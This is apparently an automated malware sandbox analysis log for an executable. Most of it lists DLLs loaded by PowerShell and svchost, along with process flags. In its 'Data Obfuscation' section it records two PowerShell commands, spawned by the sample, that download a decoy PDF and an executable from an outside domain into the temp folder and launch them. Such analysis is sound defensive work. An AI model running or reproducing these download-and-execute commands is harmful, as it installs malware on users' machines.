Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: n.pdbbd\ source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000D.00000002.1635091622.00000236BB92E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{3050F24A-98B5-11CF-BB82-00AA00BDCE0B}\LocalServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1635969714.00000236BB9C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-11CF-BB82-00AA00BDCE0B}\InprocServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: powershell.exe, 0000000D.00000002.1635814582.00000236BB989000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: initial sample Static PE information: section where entry point is pointing to: T10B924G
Source: lg1wwLsmCX.exe Static PE information: real checksum: 0x19cbc should be: 0x1e859
Source: lg1wwLsmCX.exe Static PE information: section name: T10B924G
Source: lg1wwLsmCX.exe Static PE information: section name: G8MCUXOZ
Source: lg1wwLsmCX.exe Static PE information: section name: Z2TXZQUP
Source: lg1wwLsmCX.exe Static PE information: section name: SRW4MTG9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF5FFA pushad ; retf 13_2_00007FF887CF5FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF5FEA push eax; retf 13_2_00007FF887CF5FEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF7C5E push eax; retf 13_2_00007FF887CF7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF845E push eax; ret 13_2_00007FF887CF846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF63FA pushad ; iretd 13_2_00007FF887CF63FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF7C2E pushad ; retf 13_2_00007FF887CF7C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF842E pushad ; ret 13_2_00007FF887CF845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF887CF63EA push eax; iretd 13_2_00007FF887CF63EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
